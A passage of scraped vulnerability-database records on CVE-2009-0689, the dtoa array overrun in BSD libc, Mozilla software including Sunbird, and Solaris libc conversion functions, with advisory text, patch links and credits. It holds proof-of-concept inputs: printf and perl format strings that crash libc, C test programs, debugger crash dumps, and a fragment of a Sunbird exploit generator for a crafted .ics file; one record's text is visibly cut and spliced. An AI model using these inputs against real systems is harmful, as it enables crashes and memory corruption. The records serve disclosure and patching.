Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all vendors about \\\r\nthis issue; however, it did not do so. Even greater confusion was caused by the new \\\r\nCVE number "CVE-2009-1563". Secunia reported that this vulnerability was only \\\r\ndetected in Mozilla Firefox, but nobody was aware that the problem affects other \\\r\nproducts (KDE, Chrome) and that it is based on "CVE-2009-0689". After some time the \\\r\nMozilla Foundation Security Advisory (http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)\r\nwas updated with the note:\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially \\\r\nthe same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz \\\r\n(CVE-2009-0689)". This fact (a new CVE number for the Firefox vulnerability) and the \\\r\nJavaScript PoC (from Secunia) forced us to officially notify all other vendors. 
We \\\r\npublish all the individual advisories to formally show all vulnerable software and \\\r\nto avoid a wrong CVE number. We do not see any other way to fix this issue in all \\\r\nproducts.\r\n\r\n\r\n- --- 4. Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate, Opera RC3: \\\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe The final version of Opera \\\r\nwith the fix can be expected shortly. \r\n\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvswe
b/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2G8ACgkQpiCeOKaYa9YMzACgwvAI8oo1UP6GwlmGq3m+gkHm\r\nmVoAnArUxHXAPkrpEPOOLi4X99l5sAFh\r\n=VtH9\r\n-----END PGP SIGNATURE-----\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14959", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:45:47", "description": "BUGTRAQ ID: 35510\r\nCVE(CAN) ID: CVE-2009-0689\r\n\r\nOpenBSD, NetBSD and FreeBSD are popular BSD operating systems derived from Unix.\r\n\r\nThe dtoa implementation in OpenBSD, NetBSD and FreeBSD contains an array overflow vulnerability. In src/lib/libc/gdtoa/gdtoaimp.h:\r\n\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax 15\r\n...\r\n- ---gdtoaimp.h---\r\n\r\nThe maximum Kmax length is 15; if a larger value (such as 17) is supplied, the program overflows the freelist array, with bss at 0x1.\r\n\r\nTaking NetBSD as an example:\r\n\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax (sizeof(size_t) << 3)\r\n...\r\n- ---gdtoaimp.h---\r\n\r\nThe program crashes in misc.c:\r\n\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\nif ( (rv = freelist[k]) !=0) {\r\nfreelist[k] = rv->next;\r\n}\r\nelse {\r\nx = 1 << k;\r\n#ifdef Omit_Private_Memory\r\nrv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong));\r\n#else\r\nlen = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1)\r\n/sizeof(double);\r\nif ((double *)(pmem_next - private_mem + len) <= (double *)PRIVATE_mem)\r\n{\r\nrv = (Bigint*)(void *)pmem_next;\r\npmem_next += len;\r\n}\r\nelse\r\nrv = (Bigint*)MALLOC(len*sizeof(double));\r\n#endif\r\nif (rv == NULL)\r\nreturn NULL;\r\nrv->k = k;\r\nrv->maxwds = x;\r\n}\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\n\r\nHere:\r\n\r\nrv->k = k;\r\n\r\nor\r\n\r\nfreelist[k] = rv->next;\n\nFreeBSD FreeBSD 7.2\r\nFreeBSD FreeBSD 6.4\r\nNetBSD NetBSD 5.0\r\nOpenBSD OpenBSD 4.5\nVendor patches:\r\n\r\nNetBSD\r\n------\r\nThe vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:\r\n\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD\r\n-------\r\nThe vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:\r\n\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c", "published": "2009-06-30T00:00:00", "type": "seebug", "title": "Multiple BSD systems gdtoa/misc.c memory corruption vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-06-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11711", "id": "SSV:11711", "sourceData": "\n printf %1.262159f 1.1\r\nprintf %11.2109999999f\r\nprintf %11.2009999999f\r\nprintf %11.2009999999f\r\n\r\n#!/usr/local/bin/perl\r\nprintf "%0.4194310f", 0x0.0x41414141;\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11711", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:10:56", "description": "BUGTRAQ ID: 
40309\r\n\r\nSolaris is a commercial UNIX operating system developed and maintained by Sun.\r\n\r\nThe econvert(), ecvt(), fcvt() and gcvt() functions used in the libc library of the Solaris operating system contain buffer overflow vulnerabilities when performing numeric conversion operations. An attacker can trigger these overflows by submitting malicious requests, leading to the execution of arbitrary instructions.\n\nSun Solaris 10.0_x86\r\nSun Solaris 10.0\nVendor patches:\r\n\r\nSun\r\n---\r\nThe vendor has not yet provided a patch or upgrade; we recommend that users of this software monitor the vendor's homepage for the latest version:\r\n\r\nhttp://sunsolve.sun.com/security", "published": "2010-05-25T00:00:00", "type": "seebug", "title": "Sun Solaris multiple libc numeric conversion function buffer overflow vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-05-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19689", "id": "SSV:19689", "sourceData": "\n - --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---\r\nThe main problem exists in the Sun Solaris libc. 
OpenSolaris is not affected.\r\n\r\nPoC:\r\n- ---\r\n# cat jaja.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <floatingpoint.h> /* declares fconvert() on Solaris */\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nchar number[10000];\r\n\r\nint a,b;\r\n\r\nprintf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));\r\nreturn 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja jaja.c\r\n# ./jaja 16\r\n0000000000000000#\r\n# ./jaja 512\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n00000000000000000000000000000000000000000000000000000000000000#\r\n- ---\r\n\r\n512 works fine here because we used (double)0 as the value to convert. When we\r\nuse a non-zero value, it crashes.\r\n\r\nok. 
Let's set a non-zero value in jaja2.c\r\n\r\nPoC:\r\n- ---\r\n# cat jaja2.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nchar number[10000];\r\n\r\nint a,b;\r\n\r\nprintf("%s", fconvert((double)1,atoi(argv[1]),&a,&b,number));\r\nreturn 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja2 jaja2.c\r\n# ./jaja2 512\r\nSegmentation fault (core dumped)\r\n# /usr/local/bin/gdb -q jaja2\r\n(no debugging symbols found)\r\n(gdb) r 512\r\nStarting program: /jaja2 512\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeab05c in fconvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0x8047240 134509120\r\necx 0x3250 12880\r\nedx 0x8048000 134512640\r\nebx 0xfef9e000 -17178624\r\nesp 0x8044b38 0x8044b38\r\nebp 0x8044d68 0x8044d68\r\nesi 0x200 512\r\nedi 0x0 0\r\neip 0xfeeab05c 0xfeeab05c <fconvert+163>\r\neflags 0x10206 [ PF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n(gdb) x/x $edx\r\n0x8048000: Cannot access memory at address 0x8048000\r\n(gdb)\r\n- ---\r\n\r\nWe can get the same result with perl(1).\r\n\r\nPoC perl:\r\n- ---\r\n#!/usr/local/bin/perl\r\nprintf "%.512f", 1;\r\n# perl pss.pl\r\nSegmentation Fault - core dumped\r\n# /usr/local/bin/gdb -q perl\r\n(no debugging symbols found)\r\n(gdb) r pss.pl\r\nStarting program: /usr/bin/perl pss.pl\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfed7b05c in fconvert () from /lib/libc.so.1\r\n- ---\r\n\r\nok.\r\n\r\nFunctions like *cvt(3) are also affected. 
Let's check ecvt(3).\r\n\r\nPoC:\r\n- ---\r\n# cat jaja3.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nint a,b;\r\n\r\nprintf("%s", ecvt((double)1,atoi(argv[1]),&a,&b));\r\nreturn 0;\r\n}\r\n\r\n# ./jaja3 3405\r\n%Y....[some_part_of_memory]\r\n#\r\n- ---\r\n\r\nIt looks like a memory disclosure.\r\n\r\nLet's try a bigger value.\r\n\r\nPoC:\r\n- ---\r\n# ./jaja3 3500\r\nSegmentation fault (core dumped)\r\n- ---\r\n\r\nNow it is time to debug it.\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q jaja3\r\n(no debugging symbols found)\r\n(gdb)\r\n(gdb) r 4000\r\nStarting program: /jaja3 4000\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf72 in econvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0xf00 3840\r\necx 0xdac 3500\r\nedx 0xfef929ab -17225301\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xfa0 4000\r\nedi 0x1 1\r\neip 0xfeeaaf72 0xfeeaaf72 <econvert+144>\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\neip can differ; it is not always in econvert+144.\r\n\r\nPoC:\r\n- ---\r\n(gdb) r 3501111111\r\nThe program being debugged has been started already.\r\nStart it from the beginning? 
(y or n) y\r\nStarting program: /jaja3 3501111111\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf89 in econvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0xcfa7d347 -811084985\r\necx 0x0 0\r\nedx 0x1 1\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xd0aeb747 -793856185\r\nedi 0x1 1\r\neip 0xfeeaaf89 0xfeeaaf89 <econvert+167>\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\nand it does not always crash in econvert.\r\n\r\nWe can see very interesting behavior in the printf(1) program.\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q printf\r\n(no debugging symbols found)\r\n(gdb) r %.011111f 0\r\nStarting program: /usr/bin/printf %.011111f 0\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeea48da in _malloc_unlocked () from /lib/libc.so.1\r\n(gdb) r %.0111111f 0\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n\r\nStarting program: /usr/bin/printf %.0111111f 0\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee852ab in memcpy () from /lib/libc.so.1\r\n\r\n(gdb) r %.0111111f 1\r\nThe program being debugged has been started already.\r\nStart it from the beginning? 
(y or n) y\r\n\r\nStarting program: /usr/bin/printf %.0111111f 1\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee8b05c in fconvert () from /lib/libc.so.1\r\n(gdb) x/i $eip\r\n0xfee8b05c <fconvert+163>: mov %al,(%edx)\r\n- ---\r\n\r\nFor printf(1) we got eip in:\r\n- - fconvert+163 (the same as in jaja2 with 512)\r\n- - memcpy\r\n- - _malloc_unlocked\r\n- - others\r\n\r\nThis vuln is very similar to CVE-2009-0689, but we have not found any part\r\nof the gdtoa license in the Oracle license, and the behavior in the above examples\r\ndiffers from CVE-2009-0689.\r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/ecvt.c\r\n\r\n- ---\r\n34 char *\r\n35 ecvt(arg, ndigits, decpt, sign)\r\n36 double arg;\r\n37 int ndigits, *decpt, *sign;\r\n38 {\r\n39 if (efcvtbuffer == NULL)\r\n40 efcvtbuffer = (char *)calloc(1,1024);\r\n41 return econvert(arg, ndigits, decpt, sign, efcvtbuffer);\r\n42 }\r\n43\r\n- ---\r\n\r\nefcvtbuffer = (char *)calloc(1,1024);\r\nand ndigits is bigger than the efcvtbuffer size.\r\n\r\nNow we show econvert():\r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/econvert.c\r\n\r\n- ---\r\n34 econvert(arg, ndigits, decpt, sign, buf)\r\n35 double arg;\r\n36 int ndigits, *decpt, *sign;\r\n37 char *buf;\r\n38 {\r\n39 decimal_mode dm;\r\n40 decimal_record dr;\r\n41 fp_exception_field_type ef;\r\n42 int i;\r\n43 char *pc;\r\n44 int nc;\r\n45\r\n46 dm.rd = fp_direction; /* Rounding direction. */\r\n47 dm.df = floating_form; /* E format. */\r\n48 dm.ndigits = ndigits; /* Number of significant digits. 
*/\r\n49 double_to_decimal(&arg, &dm, &dr, &ef);\r\n50 *sign = dr.sign;\r\n51 switch (dr.fpclass) {\r\n52 case fp_normal:\r\n53 case fp_subnormal:\r\n54 *decpt = dr.exponent + ndigits;\r\n55 for (i = 0; i < ndigits; i++)\r\n56 buf[i] = dr.ds[i];\r\n57 buf[ndigits] = 0;\r\n58 break;\r\n- ---\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19689", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:56", "description": "No description provided by source.", "published": "2009-12-11T00:00:00", "title": "\"Sunbird 0.9 Array Overrun (code\texecution) 0day\"", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18465", "id": "SSV:18465", "sourceData": "\n full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253\r\n\r\n[ Sunbird 0.9 Array Overrun (code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- Dis.: 07.05.2009\r\n- Pub.: 11.12.2009\r\n\r\nCVE: CVE-2009-0689\r\nCWE: CWE-199\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- Sunbird 0.9\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/77\r\n\r\n\r\n--- 0.Description ---\r\nMozilla Sunbird is a cross-platform calendar application, built upon\r\nMozilla Toolkit. Our goal is to provide you with a full-featured and\r\neasy to use calendar application that you can use around the world.\r\n\r\n\r\n--- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exists in the dtoa implementation. Sunbird has the same dtoa\r\nas Firefox, etc. 
The problem exists in the js3250.dll library (version 4.0.0 - Netscape\r\n32-bit JavaScript Module)\r\n\r\nand it is the same as SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good.\r\nMore information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a float of any length, which will overwrite the memory.\r\nKmax is defined as 15. Functions in dtoa don't check the Kmax limit, and\r\nit is possible to call 16>test.ics');\r\nprint myfile $header.$s.$expl.$footer;\r\n-----------------------\r\n\r\n0:000> r\r\neax=015e06f9 ebx=00000001 ecx=658cebec edx=00000002 esi=015e0710\r\nedi=015e06f9\r\neip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010206\r\njs3250!JS_strtod+0xb0a:\r\n600f154f 8b01 mov eax,dword ptr [ecx]\r\nds:0023:658cebec=????????\r\n0:000> ub 600f1551\r\njs3250!JS_strtod+0xaf2:\r\n600f1537 83c414 add esp,14h\r\n600f153a 8b75fc mov esi,dword ptr [ebp-4]\r\n600f153d e96bf5ffff jmp js3250!JS_strtod+0x68 (600f0aad)\r\n600f1542 56 push esi\r\n600f1543 57 push edi\r\n600f1544 8b7c240c mov edi,dword ptr [esp+0Ch]\r\n600f1548 8d0cbd08d01460 lea ecx,js3250!js_XMLClass+0x560\r\n(6014d008)[edi*4]\r\n600f154f 8b01 mov eax,dword ptr [ecx]\r\n0:000> !exchain\r\n0012fc9c: USER32!_except_handler3+0 (7e39048f)\r\nCRT scope 0, func: USER32!UserCallWinProc+10a (7e39ac2d)\r\n0012fcf4: USER32!_except_handler3+0 (7e39048f)\r\nCRT scope 0, filter: USER32!DispatchMessageWorker+113 (7e39074a)\r\nfunc: USER32!DispatchMessageWorker+126 (7e390762)\r\n0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745)\r\n0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818)\r\n0012ffe0: kernel32!_except_handler3+0 (7c839ac0)\r\nCRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882)\r\nfunc: kernel32!BaseProcessStart+3a 
(7c843898)\r\nInvalid exception stack at ffffffff\r\n0:000> k\r\nChildEBP RetAddr\r\nWARNING: Stack unwind information not available. Following frames may be\r\nwrong.\r\n0012e35c 600f15f3 js3250!JS_strtod+0xb0a\r\n0012e37c 600f0ef9 js3250!JS_strtod+0xbae\r\n0012e3f4 6010e8eb js3250!JS_strtod+0x4b4\r\n0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf\r\n0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa\r\n0012e5dc 6010195e js3250!js_Invoke+0x2c1b\r\n0012e694 60101cb2 js3250!js_Invoke+0x5c4\r\n0012e71c 60101e0a js3250!js_Invoke+0x918\r\n0012e74c 6011350d js3250!js_Invoke+0xa70\r\n0012e7a4 600e3c41 js3250!js_FindProperty+0x974\r\n0012e7bc 004274cf js3250!JS_SetProperty+0x36\r\n0012e978 0042593e sunbird!NS_RegistryGetFactory+0x1c585\r\n0012ea44 6035c7f1 sunbird!NS_RegistryGetFactory+0x1a9f4\r\n0012ea60 6035d30b xpcom_core!nsXPTCStubBase::Stub3+0x20\r\n0012ea74 00421fde xpcom_core!XPTC_InvokeByIndex+0x27\r\n0012ec2c 0041fe00 sunbird!NS_RegistryGetFactory+0x17094\r\n0012ecc0 60101906 sunbird!NS_RegistryGetFactory+0x14eb6\r\n0012ed80 60101cb2 js3250!js_Invoke+0x56c\r\n0012ee08 60101e0a js3250!js_Invoke+0x918\r\n0012ee38 6011350d js3250!js_Invoke+0xa70\r\n\r\n\r\n--- 3. SecurityReason Note ---\r\nOfficially SREASONRES:20090625 has been detected in:\r\n- OpenBSD\r\n- NetBSD\r\n- FreeBSD\r\n- MacOSX\r\n- Google Chrome\r\n- Mozilla Firefox\r\n- Mozilla Seamonkey\r\n- Mozilla Thunderbird\r\n- Mozilla Sunbird\r\n- Mozilla Camino\r\n- KDE (example: konqueror)\r\n- Opera\r\n- K-Meleon\r\n- F-Lock\r\n\r\nThis list is not yet closed.\r\n\r\n\r\n--- 4. 
Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strt
